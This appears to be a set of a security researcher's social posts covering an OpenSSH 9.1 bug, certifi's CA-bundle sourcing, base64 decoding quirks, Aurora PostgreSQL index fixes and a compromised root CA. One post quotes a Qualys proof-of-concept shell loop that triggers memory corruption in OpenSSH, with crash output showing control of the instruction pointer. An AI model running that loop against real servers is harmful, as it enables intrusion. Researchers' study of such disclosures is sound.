I love using Burp Pro for security testing, but it's also weirdly good at finding deeply-buried concurrency issues and race conditions.
This post by the Qualys Security Advisory team demonstrating rip/pc control on OpenSSH 9.1 (running on OpenBSD!) is savage: https://seclists.org/oss-sec/2023/q1/92
Here I was thinking this bug was hopeless and they one-line it without writing new code:
$ cp -i /usr/bin/ssh ./ssh
$ sed -i s/OpenSSH_9.1/FuTTYSH_9.1/g ./ssh
$ user=`perl -e 'print "A" x 300'` && while true ;do ./ssh -o NumberOfPasswordPrompts=0 -o Ciphers=aes128-ctr -l "$user:$user" 192.168.56.123 ;done...
#1 0x4141414141414141 in ?? ()
A neat post by @foote & co at Fastly: A first look at Chrome's TLS ClientHello permutation in the wild https://www.fastly.com/blog/a-first-look-at-chromes-tls-clienthello-permutation-in-the-wild
#python #infosec #tls
Today’s fun turtle-chasing[0] moment was trying to understand how a python application validated TLS certificates. The application relies on the certifi package[1], which is built from the python-certifi github repository[2]. Both of these describe the source of this data as Mozilla, but they actually call an endpoint on the https://mkcert.org service hosted on Digital Ocean[3], which is built from the Lukasa/mkcert github repository[4]. The mkcert repository uses a Mercurial repository URL hosted by Mozilla[5]. This is fed by Mozilla’s CA inclusion process[6].
Even ignoring the Mozilla CA process, the number of people and companies involved in bringing a static PEM file into your python application is mind-boggling. (A quick sketch of that plumbing follows the footnotes.)
0. https://en.wikipedia.org/wiki/Turtles_all_the_way_down
1. https://pypi.org/project/certifi/
2. https://github.com/certifi/python-certifi/blob/master/Makefile
4. https://github.com/Lukasa/mkcert
5. https://hg.mozilla.org/mozilla-central/raw-file/tip/security/nss/lib/ckfw/builtins/certdata.txt
6. https://wiki.mozilla.org/CA/Included_Certificates
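For the curious, a minimal sketch of where that PEM file lands and how an application points the standard library at it - this assumes the certifi package is installed, and requests/urllib3 do roughly the same thing internally:
import ssl
import certifi

# certifi ships a single static cacert.pem and just returns its path
print(certifi.where())  # e.g. .../site-packages/certifi/cacert.pem

# build an SSL context that validates peers against that bundle
ctx = ssl.create_default_context(cafile=certifi.where())
print(ctx.cert_store_stats())  # rough count of trust anchors loaded from the bundle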
The unintentional irony of the mkcert.org landing page is 😘
Profound boredom is the root of all innovation. This paper covers it well, but every substantive project I worked on started offline with limited technical resources and lots of time to kill (metasploit, recog, runzero): https://www.bath.ac.uk/announcements/social-media-may-prevent-users-from-reaping-creative-rewards-of-profound-boredom-new-research/
Offline doesn't mean no computing, just a lack of boredom-driven page reloading. So erm, if you are seeing this, drop into offline mode, find a park, and fidget until you find something all-engrossing to sink your time into.
Hi folks. Want to stop hearing about the bird site? Stop visiting it, stop linking to it, stop driving engagement, mute keywords, temporarily mute folks whinging about it. Just like the other commercial "social" networks, they thrive on misery and conflict, not community. Stop feeding it. It won't kill it, but your circle may stop talking about it.
Every few years I seem to forget that slightly different base64 strings can decode to the same bytes, even after excluding whitespace and the = padding.
For example, 0xd5 is the decoded result for 1a=, 1b=, 1c=, 1d=, 1e=, and 1f= -- it makes total sense once you remember that the unused low bits of the trailing character are simply discarded, but it sometimes throws a curveball into testing, especially if you assume different inputs will always lead to different outputs.
I chased a "broken" test for an hour tonight before it clicked again. Happy Friday!
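A quick stdlib repro for future me (a strict decoder wants the full two characters of padding for a single output byte):
import base64

# six different base64 strings, one decoded byte: the low bits of the
# trailing character fall outside the 8 decoded bits and are discarded
for s in ("1a==", "1b==", "1c==", "1d==", "1e==", "1f=="):
    print(s, base64.b64decode(s).hex())  # every line prints d5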
Tobias Petry's free (e)book "Next-Level Database Techniques For Developers" is eerily spot on - he addresses almost all of the painful and confusing bits I have bashed my head into while launching and scaling runZero. Recommended reading for any developer who touches PostgreSQL (or MySQL): https://sqlfordevs.com/ebook
There are many advantages to using a vendor-managed PostgreSQL (AWS Aurora), but the black-box nature of diagnostics is not one of them. For anyone else fighting with index performance suddenly going sideways (10x slower queries) on Aurora PostgreSQL: the root cause seems to be that new reader replicas can sometimes have horrible index performance, it only shows up under heavy concurrent load, and running a full `reindex database concurrently <db>` resolves it. All of the standard diagnostics (looking for invalid indexes, trying manual queries on each endpoint with explain, checking seq scan stats, etc.) pointed to everything being just fine.
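In case it saves someone an afternoon, a rough sketch of the check-then-rebuild sequence - the connection string and database name are placeholders, psycopg2 is assumed, and the REINDEX has to run against the writer endpoint since Aurora readers are read-only:
import psycopg2

# placeholder connection string - point this at the writer endpoint
conn = psycopg2.connect("postgresql://user:pass@writer-endpoint:5432/mydb")
conn.autocommit = True  # REINDEX ... CONCURRENTLY refuses to run inside a transaction

with conn.cursor() as cur:
    # the "standard" diagnostic: any indexes left invalid by a failed concurrent build?
    cur.execute("""
        SELECT n.nspname, c.relname
          FROM pg_index i
          JOIN pg_class c ON c.oid = i.indexrelid
          JOIN pg_namespace n ON n.oid = c.relnamespace
         WHERE NOT i.indisvalid
    """)
    for schema, index in cur.fetchall():
        print(f"invalid index: {schema}.{index}")

    # the fix that actually brought query times back down
    cur.execute("REINDEX DATABASE CONCURRENTLY mydb")

conn.close()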
Unrelated, but hilarious: it seems that somebody is uploading sketchy AWS database snapshots and marking them public. Is this just a troll, or can a backdoored snapshot do anything interesting (via extensions, triggers, etc.) if you load it into a sensitive environment?
In which Ian Carroll casually compromises a Turkish root CA trusted by most browsers: https://ian.sh/etugra
Copyright 1998-2025 HD Moore